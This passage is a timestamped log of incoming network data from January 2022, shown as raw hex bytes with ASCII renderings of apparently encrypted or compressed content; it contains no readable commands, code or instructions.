2022-01-24 13:09:50 UTC	8	IN	Data Raw: 1b 21 db f5 dc 50 8a 1c 54 4d 96 aa 69 f5 ae d8 6a 94 cc 4d fa d0 17 7d 62 8d 1c a5 00 a2 f8 dd 02 91 dd 6a 46 2c b2 21 3b 2d 86 16 59 8e fd 3a 68 b6 7a 5b b4 cd 0d 1b 1e ca 87 f4 02 58 01 15 ea 1f 53 8f d2 47 f5 1f 52 58 82 36 b2 b9 ee 5e 1b 0a 7e c8 cc 33 90 bf 6b 3c 06 e6 ef 0e a7 8a d1 2b 30 32 43 81 9d 2e 27 93 94 f2 8a 31 79 9e c8 ea 34 02 cd 60 66 78 ac d2 6d 6a 3e 01 b5 f5 bb 57 82 74 a8 af b6 66 f8 54 37 61 6f 5a d3 02 db 8f 07 d3 ae d6 67 76 7a 4d d9 e8 3c 3a 14 de b9 9e 1b 22 22 58 5e c7 8d 27 9f d4 45 1c d1 7f 57 d0 8b 79 c8 b2 2c 07 e8 fa 25 fc ad 9b 59 fd dc 3f 3a 3b d9 43 65 e1 9c cf 1f 75 22 0f 87 3f e4 b4 45 45 31 4c 87 3a e2 64 59 41 97 6e 26 ab 6e f8 19 ea b6 78 8b 19 61 97 c8 47 95 53 1e 4e 15 52 52 2e d9 6d 59 23 5e 22 96 80 a4 bc b4 Data Ascii: !PTMijM}bjF,!;-Y:hz[XSGRX6^~3k<+02C.'1y4`fxmj>WtfT7aoZgvzM<:""X^'EWy,%Y?:;Ceu"?EE1L:dYAn&nxaGSNRR.mY#^"
2022-01-24 13:09:50 UTC	9	IN	Data Raw: b4 6d 3f 6d 6e 5a 1a 72 23 bc b4 7c 44 f3 db 42 ad db 27 12 1b b4 b1 e6 7a 65 4b 25 2b 08 bd 52 08 a0 5c 17 2a 74 a4 a4 9e 27 64 7a 61 ac 6f b4 de 17 ef 51 a8 cf 75 0c 2e 77 90 7b 8d b2 b7 4c fc 5d 49 77 11 a6 05 89 c8 1a f7 9d af 52 25 03 88 36 4d 7a 5e 37 b1 32 f9 9d 55 de 00 aa b8 0e ea f3 86 29 7b 25 1c 19 7d c0 31 57 0a 80 27 1c ff cc c6 3f 97 27 dd e5 84 01 49 a7 ad 08 07 e9 4f 1b f8 ef 66 89 ae cb c3 4a c7 a0 c0 16 63 bc d3 9e 58 27 03 f5 ae 85 0d 75 c3 6c 24 95 c6 53 b9 ba 58 d7 17 98 78 58 43 50 09 78 fd ff 3f ec 76 08 2c 2b 80 22 ee b6 c9 a3 73 ac 5d 4f 2d e1 46 e7 2b 6b 7d 7b dd 5f 0c c2 93 41 c5 fd 14 46 c3 96 a4 12 3a c6 0b 99 42 0d f6 f7 df 53 8c 67 6d 09 fe 5c 58 a1 82 82 ed be 0e 95 4f e5 42 8d 63 60 e4 4d 7a 0e c0 4c f4 28 08 70 2e 3d 28 Data Ascii: m?mnZr#\|DB'zeK%+R\*t'dzaoQu.w{L]IwR%6Mz^72U){%}1W'?'IOfJcX'ul$SXxXCPx?v,+"s]O-F+k}{_AF:BSgm\XOBc`MzL(p.=(
2022-01-24 13:09:50 UTC	10	IN	Data Raw: 54 37 4b 78 29 6c 56 db 85 68 19 ae d6 6d 71 52 de db e8 3a 33 3c 14 bb 9e 1d 81 9e 58 5e 24 98 54 20 a4 45 16 be a5 57 d0 80 6d d0 23 2e 2e ec f3 0d 74 af 9b 4e c3 71 3b 02 21 cc 30 da e1 8d c1 6f bc dc 0e a1 34 c5 3f 6f 35 35 45 a9 00 ff 6e 4c 6d 29 7f 22 be 6c 75 a7 c6 bd 7b cc a2 61 97 c8 4b a2 dc 0f 4a 13 4a 7e ae 25 6c 73 13 e9 35 be f3 b3 cf 01 25 9e a0 b6 95 6f 52 b6 b7 83 78 86 8f 40 99 ec 14 97 13 7d 9d 4b 07 be 0f 0f 83 16 f5 36 2b 2e 19 25 20 c8 e8 9d ee 48 0d eb b5 61 1b 37 0e 1b a9 ec e9 a0 a0 6a 85 a2 a9 d2 dd 5d 4a 57 8a da 4a 59 68 90 22 7c 6f 93 95 41 16 b3 7b 59 9a 86 a0 6c 31 e3 3a 49 3c 94 75 ef 64 ab b8 a3 4d 2d f9 dd d6 d6 22 b6 10 16 31 0d 72 75 3d 2f 31 c4 03 ec dd 38 6a 93 af e5 c3 34 32 12 79 85 48 f4 0d ea 52 33 82 f4 a7 27 01 Data Ascii: T7Kx)lVhmqR:3<X^$T EWm#..tNq;!0o4?o55EnLm)"lu{aKJJ~%ls5%oRx@}K6+.% Ha7j]JWJYh"\|oA{Yl1:I<udM-"1ru=/18j42yHR3'
2022-01-24 13:09:50 UTC	12	IN	Data Raw: 4a b6 a0 c0 16 c9 dc c2 96 71 e9 04 dd d6 e8 cb 73 eb 19 f8 99 e8 17 19 ba 52 f5 40 39 78 52 97 57 30 f0 d7 05 39 83 d2 67 ea 21 a8 bf 30 b9 e6 88 2b 34 5d 45 34 c9 69 d9 3f 43 f6 a7 dd 48 12 67 55 41 c5 fa 6f 94 d7 be 0d cc 35 e9 0b 0a 42 0d f6 8b 59 7b b4 6d 6a 6c 86 5c 49 a3 a6 8e f8 96 8a f8 89 e3 5b 0a ba 6f c1 64 5e 0b d1 43 f1 0a 08 59 2e 3d 28 ce 4a 6b 1c 9d b0 cc eb 33 ad b7 1e d4 37 03 b4 f1 5a 5e b1 4e 90 5e 6b 16 0c 51 ab 6e 3c 81 56 36 f3 6c 83 1d 05 b1 b6 1e ed a7 3c 70 ff 57 7e eb f9 4a 26 bb 0f f9 ca 78 9a e6 6a b9 ca 4b 6a 8d cc f4 e6 18 54 22 f2 b5 8f f2 46 5d 22 1e 79 1b cb 48 a2 55 88 b5 a1 79 b7 be 44 40 6e f2 31 fa 57 77 16 1e ec 1f 08 be 9e 8a 76 89 ed 67 32 d2 e2 85 ac a9 1e 5e 41 42 cb 66 ad 8b da 60 95 c2 c6 fe d9 78 b7 71 88 07 Data Ascii: JqsR@9xRW09g!0+4]E4i?CHgUAo5BY{mjl\I[od^CY.=(Jk37Z^N^kQn<V6l<pW~J&xjKjT"F]"yHUyD@n1Wwvg2^ABf`xq
2022-01-24 13:09:50 UTC	13	IN	Data Raw: 7b b5 f5 1d be 05 19 f0 a9 f5 36 8d 45 d9 25 2e c2 ef b5 c9 4e 0d ed b3 49 85 35 14 1d 81 53 e9 a0 aa 7d 3f 19 a9 d2 d9 32 8a 57 5d d4 4d 71 f8 92 22 7a 7c bb 35 42 16 b5 53 e7 7c 82 aa 7b 4c 5c 3a 49 c2 ff b5 ef 6b a1 bf 8b f6 2f f9 da df fe 80 b4 13 15 19 b3 7c 75 37 38 53 7e 03 ec d8 57 aa 93 b5 ef c4 1d 91 10 79 83 61 d9 a9 e8 5c 35 aa 4a 89 22 0b b6 9a 3a cd 58 d8 3a 28 11 2d ce 4b ae e6 f5 ed e7 8f ad 13 5f ba 6c ae 94 22 8b eb 69 82 9c 34 8a 3e 8d f0 28 4c 52 a6 5b 34 58 39 06 58 a6 ee 0a ec 46 e8 c1 12 38 63 ac 45 18 19 77 d0 fb a2 1b 60 29 91 a5 dc 2a c5 ee f1 03 b8 be e4 d7 b8 d1 6c 08 25 50 db 78 d4 0d 8e e6 01 98 a4 79 f9 82 c2 67 60 b8 90 ee 55 10 1e ce b8 96 09 b1 6d 35 4b 56 5a 1a c4 f8 bc 9c 44 44 f3 dd 86 a1 f3 11 12 1b be 99 15 7f 65 41 Data Ascii: {6E%.NI5S}?2W]Mq"z\|5BS\|{L\:Ik/\|u78S~Wya\5J":X:(-K_l"i4>(LR[4X9XF8cEw`)*l%Pxyg`Um5KVZDDeA
2022-01-24 13:09:50 UTC	14	IN	Data Raw: 4f 4f b6 46 4c 51 ff 51 ab 6e f4 b2 07 25 d0 b4 84 00 fd df 5c 15 ef bb e1 10 37 7f 49 e1 d3 5e 3e 9d 20 da 34 79 bc 30 42 86 c0 24 a4 a7 d0 f5 f0 21 f8 dd f3 99 98 f9 3f ba cf 04 78 08 e0 67 d7 55 a4 b7 ab 5e 9f 73 58 be 65 cd 1b e9 1f d3 3f 1c e6 1a 34 6f bb cf 4c 80 ed 66 39 25 f2 8e c5 89 0a 6c 5e 51 d1 41 c5 b8 26 61 bf d3 d7 e4 d0 10 62 8f 89 21 a2 3d d9 d8 a2 fd 6a 80 7d 69 3b 9a 59 09 2f 80 2d 48 8b e5 35 11 b6 6b 47 b4 cd 27 9f 60 df 87 f4 17 74 6c eb eb 39 f2 86 c4 5a dd 62 54 41 7a 95 8f b9 e2 2c 19 19 7a cc 7f 26 8e 5a 6c b2 10 ea fb ea b4 96 c2 2b 92 32 42 b5 18 2f 0b 88 bb 04 e7 31 73 ea 59 85 da 08 c7 42 72 30 b1 cb b7 6a 05 05 ad 4a 8e 7b 8b 5e 9b af b6 58 f5 4d 24 45 6f 4b d7 4c 25 8e 2b dc 85 f8 7c 65 7e 4d c8 ec 21 c4 15 ac bc 89 31 b7 Data Ascii: OOFLQQn%\7I^> 4y0B$!?xgU^sXe?4oLf9%l^QA&ab!=j}i;Y/-H5kG'`tl9ZbTAz,z&Zl+2B/1sYBr0jJ{^XM$EoKL%+\|e~M!1
2022-01-24 13:09:50 UTC	16	IN	Data Raw: 13 57 ef 97 af b8 3a f5 e3 69 98 98 4a 93 3e 8d f4 47 ea 57 a6 51 00 a1 c7 f9 cf bc e7 06 e3 4e f7 c8 f6 39 4f ba 3b 10 19 77 a3 80 ba 1b 6e 2d b9 81 59 2f cf 6e f6 03 b8 ba e1 dd b4 d0 64 17 35 ae 4e 51 df 0a 9b 98 18 98 06 78 5b 9d df 6b 60 b0 96 10 54 3d 0d c8 90 2c a5 b4 6b 1d 9f 54 5a 1c 17 85 bc 9c 41 4e ee d1 9c a9 e8 ee 13 37 ad 9f f6 a2 67 41 fd 03 f9 20 52 0e c5 fa 1b 02 49 ae b8 98 0f 54 6c 9f a7 9d b6 e3 1b ee 19 b7 dd 8b 0d 1e 75 a7 46 b5 ce 53 b3 03 76 52 47 51 a6 d2 e9 c8 16 c7 9d af 42 27 2b 19 36 41 08 31 0f ab 32 f3 f3 60 de 84 a0 b5 58 59 ff 9c 29 5e 0c 2b 19 7d ca a3 cb 22 71 3d 1c f5 de d9 2f 9b 23 e1 e4 09 7b 68 a7 ac 14 ff ef 4d 1b ff c5 5a ad ae c1 e1 9c 8e a0 ca 15 99 6b 0b 26 4a 29 12 d6 c1 83 62 8c eb 13 2c 9c d1 25 0b bb 70 9c Data Ascii: W:iJ>GWQN9O;wn-Y/nd5NQx[k`T=,kTZAN7gA RITluFSvRGQB'+6A12`XY)^+}"q=/#{hMZk&J)b,%p
2022-01-24 13:09:50 UTC	17	IN	Data Raw: c9 5c 0d a5 7e 51 b6 cd 05 e1 61 f3 82 df 43 6b 68 11 ea 04 f5 82 29 5f f1 76 47 72 99 87 a7 bc e5 24 1a f4 7f e0 61 34 eb 81 6d 9e 13 6d 44 67 65 87 dd 35 81 27 46 b8 e2 38 d9 98 90 68 9d 22 77 e0 4a ee 29 f6 c6 64 5c 53 a9 e0 df 95 eb fe bd a3 59 5b 8a 7f 99 3d a0 78 f8 54 2c 71 6b 5a 50 51 db 8f 28 d9 ae c7 4f 3e 7a 4d df 68 1c 3a 14 84 c7 ba 1b a9 24 74 60 50 ac 27 9f a0 52 2f c9 1b 72 d0 8a 6e 76 01 3a 1f c6 d2 6f e2 ad 9d 65 ee 12 68 05 2b db 68 7b 9f ae cb 00 78 c4 3d bd 4d c8 a8 6d 31 bd fb 97 a9 f1 46 01 45 97 79 0f b1 a6 35 1f c6 bd 59 ea 62 61 91 c0 52 ca ae 0d 4a 15 3d 5b 34 27 68 5d db 55 35 b8 d1 e4 bc be 2f ad b3 a7 5d 6f 52 b8 98 4a e1 84 89 6e b4 c4 88 9f 93 73 b5 f5 03 63 f8 1e f0 a9 8b 3e 21 41 dd 0d 0e c0 ef b3 65 62 23 ed bc 43 93 0e Data Ascii: \~QaCkh)_vGr$a4mmDge5'F8h"wJ)d\SY[=xT,qkZPQ(O>zMh:$t`P'R/rnv:oeh+h{x=Mm1FEy5YbaRJ=[4'h]U5/]oRJnsc>!Aeb#C
2022-01-24 13:09:50 UTC	18	IN	Data Raw: b3 ab 8f 24 f7 6f a0 cf 75 08 1a 77 8f 43 8b 96 89 4c fc 56 c9 7f 55 a6 1d 34 bb 14 ed 9d ad 4c 05 30 fd 48 49 02 5e 3f 83 68 fb 9c 53 f6 a0 aa bf 8f 6a f7 9c 29 7f f9 49 1b 7d c0 87 cd 0a 8c 3b 73 f8 cc dd 05 f4 2e e0 e4 8e 29 6c a7 ad 1f 40 93 4c 1b f4 82 46 ac ae c1 df 9c 8f ff c2 03 05 22 d2 88 a7 2d 5b df f0 23 0d 73 eb ed 27 83 3e 21 46 b8 78 78 78 39 78 a6 48 41 df f9 a0 d3 53 81 58 76 2c 21 a9 da e4 b7 c3 aa 73 31 5c 4f 2d c3 40 e2 3f 45 93 e4 dd 59 10 63 81 43 49 82 00 52 d6 d1 0d 13 3a c6 a3 1a 42 0d f8 45 a5 52 8c 6d 14 6e 58 5c 5c 83 8c 89 f9 90 a4 b3 4f e3 51 80 6c 60 e4 48 17 03 d1 49 e6 2c ac 1f 2e 3d 23 7f 40 7b 14 bf 54 e8 eb 35 c8 f1 16 d4 3d d9 af 54 55 69 b1 4a 47 eb 4f 3e 34 53 13 4c af 81 47 38 f3 60 81 1d 05 c8 58 30 ed ad e8 69 e9 Data Ascii: $ouwCLVU4L0HI^?hSj)I};s.)l@LF"-[#s'>!Fxxx9xHASXv,!s1\O-@?EYcCIR:BERmnX\\OQl`HI,.=#@{T5=TUiJGO>4SLG8`X0i
2022-01-24 13:09:50 UTC	20	IN	Data Raw: 3f e1 e0 f3 f1 a6 84 60 f8 d4 3b 13 30 c4 7a 9b e0 a1 c1 73 5e de 0e ad 39 f2 92 7e 2e 33 5d 9a 87 c3 90 4b 69 9b 7c 72 b2 14 15 19 c6 b7 6e 9c 71 7a 97 d3 57 95 76 f3 4b 39 53 47 31 0f 3f 75 3b 51 0c dd 06 5b 43 a1 11 8d b1 d9 44 74 4d b1 4e aa cf 8a 8d 57 9b ec 99 94 13 71 a6 ff 18 b0 16 03 f0 b8 ee 29 1c bf d8 09 2f c4 c7 b6 70 4a 0b 82 96 4b 85 33 11 23 92 49 e9 b1 b1 62 cc e3 a8 fe db 34 9b 40 e5 f4 4f 71 f1 8d 19 69 7d bb 24 58 09 87 ad e6 b6 8d bb 70 53 5a ec 5a 3d e4 86 fc 7f a1 ae 90 f3 06 07 da f3 f5 91 bf 01 05 cf a0 79 6a 1d 2b 59 7b 12 f7 c8 4e 54 92 83 e5 d5 17 8b c6 6a 88 5e c6 ba f3 52 24 b1 52 59 26 27 b0 83 29 c6 41 d1 21 28 01 36 d1 53 50 da dc e3 e5 90 a6 3b 4e f0 69 a4 87 3e 94 f2 7a 83 9c 25 90 21 b8 0e 29 3a 50 b7 42 31 47 0f 15 2b Data Ascii: ?`;0zs^9~.3]Ki\|rnqzWvK9SG1?u;Q[CDtMNWq)/pJK3#Ib4@Oqi}$XpSZZ=yj+Y{NTj^R$RY&')A!(6SP;Ni>z%!):PB1G+
2022-01-24 13:09:50 UTC	21	IN	Data Raw: 9e dd a1 1c 3e 59 67 2f e8 41 e7 50 54 fd 79 d7 75 08 5e 90 50 d6 fa 18 7a 86 be 07 14 29 cb fe 97 42 0d fc 89 7e 42 9f 6b 73 4e 09 5c 58 ad 9d 8d 24 0e 8c 97 4f cb 6c 00 64 6a cc 74 69 0b db 94 60 2e 20 61 26 1d 26 90 4a 7a 27 cf 7f dd e7 5a d9 70 1e de 52 c1 ba d4 78 41 e3 4e 9a 4b 5d 29 25 46 ba 74 ea a9 17 3e db b2 90 08 04 b2 53 1e ed ad e2 7f da 5f 09 b0 da 40 35 9d 27 c1 ca 88 af 61 42 39 c2 24 a8 3a db 28 7d 0d e1 23 f3 a6 88 eb 3c 85 34 19 1f 2b e7 70 29 54 88 b5 93 15 c4 5c 59 41 64 eb 3e f5 71 18 35 0d e8 08 12 a9 a0 cd 00 8b ed 67 32 dc 2d b1 eb bd 1c 5e 4d 60 e2 41 c2 a4 06 60 85 5c eb ef d0 16 56 60 8f 27 a1 0a dc e0 dd 02 34 7e eb 72 39 95 50 39 2d 81 b4 48 c3 e7 7c a7 b4 76 4b a7 c9 1e 04 50 da 87 1d 06 70 7b 26 ea 15 e0 9a f7 50 5d 73 50 Data Ascii: >Yg/APTyu^Pz)B~BksN\X$Oldjti`. a&&Jz'ZpRxANK])%Ft>S_@5'aB9$:(}#<4+p)T\YAd>q5g2-^M`A`\V`'4~r9P9-H\|vKPp{&P]sP
2022-01-24 13:09:50 UTC	22	IN	Data Raw: 7d 29 9e 33 73 4a bc 24 4a 79 e2 53 e7 90 5a a2 51 42 5c 3a 48 2a fb b5 ed 64 4f bf db d2 2e f5 db df fe 80 b6 10 4b 18 bf 15 74 3b 38 42 7b 03 ff e7 52 aa fa af ef c4 24 91 10 68 95 4d f7 c8 e8 5a 22 54 4b 8b 25 13 ba 95 32 d7 a6 c3 16 38 13 3b c9 49 20 6c f3 63 50 a9 9e 12 5f fb 72 a2 94 25 93 15 68 b4 8f 36 05 89 8e 7e 9f c0 40 7c 4c ec d5 12 06 30 a2 e5 13 ef 46 e0 d8 f6 39 4f a3 47 0e 1e 61 a5 70 15 33 5d 28 91 af 43 23 c5 e6 e8 fd b9 92 fc c0 b4 d0 64 13 db 51 63 7f ff 0f ab 7b 06 b2 06 7c f9 99 fe 62 60 bc 8e ee 55 28 1e ce a9 e5 93 b5 6d 3f 4e 7e 53 19 78 fb 94 88 4a 44 f9 df 83 ad ec 58 7d 0e bf 99 d4 52 7c 40 fb 21 33 24 50 20 fd 82 1b 04 50 a3 be 87 07 43 6a ec 8d b1 b4 f5 04 e4 00 af d5 64 06 24 68 9c 6b 82 bf ad 46 ed 54 56 67 83 b5 11 f8 cf Data Ascii: })3sJ$JySZQB\:H*dO.Kt;8B{R$hMZ"TK%28;I lcP_r%h6~@\|L0F9OGap3](C#dQc{\|b`U(m?N~SxJDX}R\|@!3$P PCjd$hkFTVg
2022-01-24 13:09:50 UTC	24	IN	Data Raw: dd fa ec d8 e0 0f fd b7 97 90 21 82 48 19 5b 31 e6 70 23 49 9b b1 b3 44 9b 63 ba 41 48 e2 0e f8 74 18 2e 18 f7 e7 05 83 a9 e2 46 e1 37 d6 36 0d 7e 89 c3 8a 1d 52 5b 5b de 41 d3 aa c1 9e 92 fd cb ed d9 3f 46 70 88 07 ab 0c cf e4 dd 13 91 67 85 42 17 9c 55 59 20 99 a7 4c 8b f4 16 07 48 7b 7d a4 de 0c 1b 60 ce 83 e9 f8 71 57 17 c1 10 c9 e5 28 a1 22 7b 7a 58 97 a4 af bc 9a 24 03 0a 45 cc 6e 33 83 b7 62 a6 4d e7 f3 70 bf 9b de 34 6c 22 6a d4 f2 fe a7 99 bc 6a a2 25 73 e0 51 c2 39 0b c7 4e 45 f5 ab d8 b3 6b 07 0b a4 be 99 50 aa 67 a8 af bc f0 e9 5e 20 5e 4b d6 ec 56 db 8e a5 c8 a4 ce 76 71 d8 5c d3 f1 2a b6 2b 80 b9 9f b9 b8 2a 42 41 3e 03 18 9f a4 44 be c0 6f 44 db 9b 61 ec a2 37 a3 c5 fa 25 e3 be 97 59 e7 d9 2c 9e 3a d7 54 73 7d 9c c7 18 6b 40 1f a7 2a fb 34 Data Ascii: !H[1p#IDcAHt.F76~R[[A?FpgBUY LH{}`qW("{zX$En3bMp4l"jj%sQ9NEkPg^ ^KVvq\+BA>DoDa7%Y,:Ts}k@*4
2022-01-24 13:09:50 UTC	25	IN	Data Raw: 6e 39 8b a5 59 2e de de fd 03 32 be fe d7 85 d0 6c 19 0d 68 4f 7d de 1a 8c fe 12 9c 04 0f b8 83 ce 6d 6a a1 99 ea 53 7e 48 ce b8 9c c8 a8 6c 35 4f 5d 84 44 71 ea e4 8a 46 01 f6 dd 9c a1 f3 10 12 1b 7e 66 21 85 a2 be 04 d4 f1 dd ad f7 4a 7d e4 fd 9d 97 b5 90 02 54 3f 63 a6 b1 b4 f4 17 ee 11 67 30 8a f3 ec 57 f9 59 8d be ac 58 02 5f 41 61 ab a5 46 e0 de e8 ec c2 51 42 51 19 e4 36 40 2a 69 3b ab 38 27 51 75 ed 84 a0 3f ad a8 fe 9c 23 01 23 15 35 78 e8 97 c9 0a 86 17 1c ff cc cd 0f 9b 26 e1 e4 84 54 01 a7 a1 4c 2f 94 4d 00 ce e9 4e 9d ae cb c9 5c 8e a0 d1 1e 14 c9 c5 b6 1a 2d 04 d7 db 80 1a e9 ef 06 30 bd 83 21 19 b0 54 d5 6e a3 72 86 5b 7f 16 f8 ff f5 11 ad d6 08 2a 2b 80 8d ee b6 c9 7e 1c 32 77 4e 37 eb 41 e1 3f 43 fc 65 c1 59 08 55 94 41 c4 e7 30 5b d7 55 Data Ascii: n9Y.2lhO}mjS~Hl5O]DqF~f!J}T?cg0WYX_AaFQBQ6@i;8'Qu?##5x&TL/MN\-0!Tnr[+~2wN7A?CeYUA0[U
2022-01-24 13:09:50 UTC	27	IN	Data Raw: f3 72 ba f1 33 2f 92 27 29 f8 e7 2e 2d bf be 63 e5 63 72 e0 51 f2 1a 03 e7 4d 5e 78 2c d2 6e 3b 15 01 b5 bc 99 c6 95 58 a3 8f b3 52 f8 d4 3d 9c 2f 5b d3 56 d3 98 96 cf 80 dd 47 74 7a 4d 59 e2 e1 15 15 80 b9 b5 0a a1 37 c9 48 00 84 07 9d a4 45 9c db b8 4b d1 8a 6a f6 b2 00 07 e9 d2 57 e2 ad 9d 51 d8 ef 35 06 28 b4 dd 64 e1 8b d8 04 6d d8 23 ac 29 e7 75 97 35 33 4c 90 9c 92 7b 4a 45 9d 81 29 b5 7b 04 0f c5 95 03 a3 62 67 94 c6 64 fd 45 0d 4c 7a 12 57 34 2d 4a 77 33 38 67 bf f9 ae b1 b7 3b b1 a1 f9 50 6f 52 3c ba 76 20 84 8f 46 98 d2 19 8e 3d 70 95 f0 07 be 85 12 2d 1b f5 36 21 49 ce b4 3e f3 e4 95 76 4a 0d 6d b6 94 24 35 0e 1d 89 45 78 b6 84 74 fe 0a 38 d8 0a a0 8a 57 8a d8 55 e0 e1 bc 29 5a 63 bb 35 c3 1c 68 d2 e7 9a 86 a2 62 d3 4b 14 5d 3e e2 24 f6 4a af Data Ascii: r3/').-ccrQM^x,n;XR=/[VGtzMY7HEKjWQ5(dm#)u53L{JE){bgdELzW4-Jw38g;PoR<v F=p-6!I>vJm$5Ext8WU)Zc5hbK]>$J
2022-01-24 13:09:50 UTC	28	IN	Data Raw: ce aa bf 94 c2 e3 9f 29 7d 0c 65 19 7d ca bc db 18 9e 15 44 fe cd d7 1c 88 35 f2 cc 99 02 68 a1 85 40 2e 94 47 33 da ed 4e a7 a4 e3 93 63 8e aa e8 02 14 dc d5 98 71 33 07 dd d6 af 2a 73 eb 19 49 0d c0 20 13 b1 5a f5 31 39 78 52 3d 64 21 f8 fe ec 31 92 dc 20 0c 22 a8 b3 e8 9e e7 a0 1c 3e 32 be 27 eb 4b f0 37 6b 2c 7b dd 5f 75 1f 94 41 cf ed 08 45 b8 f2 07 12 30 dd 2b 15 08 0d fc 92 15 18 8c 6d 60 77 50 33 ab ab 8e 80 ea 90 a4 b6 4c e3 5d 0c 6a 65 8b 17 68 0b db 26 be 2f 20 6b 3d 29 09 59 5b 6e 7b 77 7c cc e1 1d 5e 71 1e de 2e d1 aa d2 75 7f b6 c0 2d 22 e7 3e 34 5b a3 75 ee 8f 42 2f d7 db de 1c 03 d4 58 40 ec ad e8 6c d0 57 de eb f9 4a 24 97 48 59 ca 78 9a 2b 61 b9 c4 35 a9 9b dd f5 7e 91 8e 8a f2 b5 94 eb 3d fb e5 1e 73 02 ca de f7 42 99 a1 c6 6e 9f 74 45 Data Ascii: )}e}D5h@.G3Ncq3*sI Z19xR=d!1 ">2'K7k,{_uAE0+m`wP3L]jeh&/ k=)Y[n{w\|^q.u-">4[uB/X@lWJ$HYx+a5~=sBntE
2022-01-24 13:09:50 UTC	29	IN	Data Raw: 01 a3 68 61 97 c2 4c 91 75 09 4a 6f 43 56 34 6a 6c 75 2a 43 3e cd 99 a5 bc b4 29 ed cb d8 55 65 5f be cb e3 e3 84 8b 55 96 b7 ac 94 13 71 a6 f0 16 bb 14 1e 9f 8c f4 36 2b 50 dc 3d 4f e5 ee b5 79 5b 08 f5 d3 61 84 35 04 1e a9 37 e8 a0 a0 6e f2 0c ac bd fe 33 8a 5d 99 d7 5c 76 e6 96 34 6b 62 35 82 2c 3c b4 53 ed 91 58 b0 6a 47 33 59 48 36 f1 bc 80 00 a0 bf 81 30 f1 f3 d2 f3 f8 89 db 47 10 19 b9 ae 7d 30 57 54 7a 03 e6 fd 57 aa 92 b3 ef c4 1e 91 2e 79 99 19 dc a7 e8 52 35 aa 48 a7 29 0b ec fd 3a c7 58 c2 3a 28 0b 1d ca 4b 29 db f0 ed aa 81 ad 02 4b fa 1a ce 95 2d 81 e7 1a f9 9d 34 81 33 84 f8 20 12 38 b0 5a 3a 52 56 9e 30 a3 e4 65 c3 47 e8 cb 1b 3e 10 89 44 18 13 64 a2 ef a7 0a 68 46 b4 a4 59 25 d4 eb e6 6c 9f bf fe dd a9 d5 74 67 0d 51 4f 77 d7 25 e5 e7 01 Data Ascii: haLuJoCV4jlu*C>)Ue_Uq6+P=Oy[a57n3]\v4kb5,<SXjG3YH60G}0WTzW.yR5H):X:(K)K-43 8Z:RV0eG>DdhFY%ltgQOw%
2022-01-24 13:09:50 UTC	31	IN	Data Raw: a4 9d 8d f9 87 8b 88 46 1d 5a 2c 6d 58 72 4c 69 0b ce 43 f1 29 20 70 29 22 2e ee 4b 56 1f cb 31 cc eb 31 d1 77 01 d9 2e da bb c5 75 70 4f 4f b6 48 4a 32 2e 42 ac 64 f3 86 5d c0 da 98 96 15 23 de 71 1e ed 85 ec 7e da 75 61 86 f8 40 3f b0 31 da d9 7f 90 29 6d bf 3c 25 8e 8e d4 ed f7 26 f0 24 ee 4b 9f d6 20 ea 6e 1e 73 0c ea 6d 3a 53 88 a4 b4 48 61 75 68 46 6d cd 3b f5 63 1f 3f 0d eb 01 fa ae 95 e2 52 9d de 7f 38 c8 f4 a2 d2 8d 0a a0 46 64 d9 56 d1 a9 d8 71 94 ce cf 11 d1 3b 7e 5a 8d 35 c7 e8 23 1f a3 73 94 7f 71 6b 4f 9b 4a 33 2e 84 b1 60 1d e5 12 17 9c 61 61 a2 c9 78 1f 60 df d7 f4 06 61 6d 1f e8 0a fc 9c ac 0a dd 73 54 70 a5 94 a3 b6 9b 55 02 0a 74 da f4 0a e3 a5 6d 94 1b f1 f1 58 c8 8b d1 25 ba 2d 47 a9 ec 38 0f 0c bc 6b 8c 19 7d e1 5b e0 49 5d c7 48 5a Data Ascii: FZ,mXrLiC) p)".KV11w.upOOHJ2.Bd]#q~ua@?1)m<%&$K nsm:SHauhFm;c?R8FdVq;~Z5#sqkOJ3.`aax`amsTpUtmX%-G8k}[I]HZ
2022-01-24 13:09:50 UTC	32	IN	Data Raw: 7b 09 ff d0 7c c9 81 a8 c7 bb 1d 91 1a 75 85 49 b3 b2 e9 52 3f a7 43 8f 08 0b b6 9f 17 cf 73 8b 33 00 a3 2d ce 4d bd df e1 e9 69 36 bb 22 65 e0 6d bd 9d 3b 98 e3 42 b1 8d 3d 9a 36 17 e3 2e 07 51 a1 73 1e 58 39 0c 23 a6 ff 0f cb 77 e8 c1 02 14 6a bc 40 10 10 5f 16 fe a2 1d 7f 21 86 73 4a 27 d4 e6 ef 0a 36 09 cc 18 aa d7 44 88 24 50 45 50 40 d3 8e f4 06 66 10 68 f9 82 d5 08 37 b8 8a e4 89 3b 1e ce b9 86 a7 b4 6f 35 bb 54 27 61 7b f3 bc 9c 4b 44 e8 ed 99 a1 c5 10 12 1b ed 99 de 6b 4d fe fa 2b 26 29 55 16 d4 e1 1b 02 47 8c 8a 96 0f 5a 52 4f a4 b1 b2 9b d0 ef 11 ae c8 0e 02 33 77 88 37 c0 be ad 4d f6 82 43 70 79 a0 1e 86 9f 16 ed 97 73 55 0f 03 e4 37 51 02 5e 39 ab 34 f9 b8 7f de 8e aa bf 85 ea e4 ac 2d 7b 28 1e 19 7d 94 af c9 1b a4 08 1f ff cb d7 7c af 26 e1 Data Ascii: {\|uIR?Cs3-Mi6"em;B=6.QsX9#wj@_!sJ'6D$PEP@fh7;o5T'a{KDkM+&)UGZRO3w7MCpysU7Q^94-{(}\|&
2022-01-24 13:09:50 UTC	33	IN	Data Raw: 2c 56 34 47 ab 64 e2 81 47 3e dd b4 f9 9d 03 cb 6a 1e ed ac f1 4f d9 7f 1d ea f9 40 62 9d 27 d0 dc 6b 95 00 2a a9 c2 24 a2 9c c9 e0 0e 27 cd 2a ca 02 9e fa 29 8b 2b 0d 76 08 f6 75 34 aa 89 99 b6 43 92 6a 57 45 64 f0 13 f4 7a e6 3e 30 fd 11 2c fd ba e5 57 e4 70 61 21 d1 df f2 dc 81 0f 5b 47 59 df 59 3c af f4 69 e0 6d c0 ef da 1d 65 62 8d 0d b1 13 c3 ef 23 03 b9 74 6d ce 2e 9a 4a 38 07 9f a4 5b 8e e5 03 14 a1 84 50 8b ca 07 0c 65 df 96 f1 1a 8e 7a 39 e1 17 d9 17 d6 5e d7 60 54 45 97 91 a3 ad f1 3f 0f f4 7f e0 66 2b 82 72 60 81 1a f0 f6 70 ae 8f cb d1 93 0f 52 af e4 06 28 9a bc 6d a2 15 73 e0 51 85 f9 08 c7 42 45 6b a9 d8 a2 6f 0f ff b4 98 84 55 aa 59 a8 af bc 7e 62 48 24 44 6f 4b d6 49 d6 71 06 f5 a5 df 76 